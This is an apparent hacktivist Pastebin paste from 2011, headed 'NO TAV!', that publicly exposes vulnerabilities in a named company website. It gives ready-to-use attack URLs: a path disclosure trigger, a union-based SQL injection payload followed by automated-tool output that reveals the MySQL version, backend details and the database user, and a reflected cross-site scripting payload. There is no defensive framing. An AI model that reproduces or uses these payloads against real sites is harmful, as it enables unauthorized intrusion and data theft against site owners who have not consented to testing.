Guest User

Untitled

a guest
Jul 4th, 2011
1,318
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. NO TAV!
  2.  
  3. Con Sole e Baleno nel Cuore
  4.  
  5.  
  6. --- Full Path Disclosure
  7.  
  8. http://www.ltf-sas.com/index.php?lg_visite=aaa
  9.  
  10. Apache/2.0.54 (Win32) PHP/4.4.0 Server at www.ltf-sas.com Port 80
  11.  
  12. --- SQL Injection
  13.  
  14. http://www.ltf-sas.com/pages/articles.php?art_id=-1%20union%20select%201,2,3,4,5,version%28%29,7,COUNT%28*%29,9,10,11,12,13,14%20from%20ltf.articles
  15.  
  16. [19:17:55] [INFO] testing MySQL
  17. [19:17:56] [INFO] confirming MySQL
  18. [19:18:00] [INFO] the back-end DBMS is MySQL
  19. web server operating system: Windows
  20. web application technology: PHP 4.4.0, Apache 2.0.54
  21. back-end DBMS: MySQL < 5.0.0
  22. [19:18:00] [INFO] fetching current user
  23. [19:18:00] [INFO] retrieved: ltf@localhost
  24. current user: 'ltf@localhost'
  25.  
  26. --- XSS
  27.  
  28. http://www.ltf-sas.com/pages/search.php?recherche=%3E%3Cscript%3Ealert%28%27NO+TAV%27%29%3C%2Fscript%3E&imageField.x=0&imageField.y=0
RAW Paste Data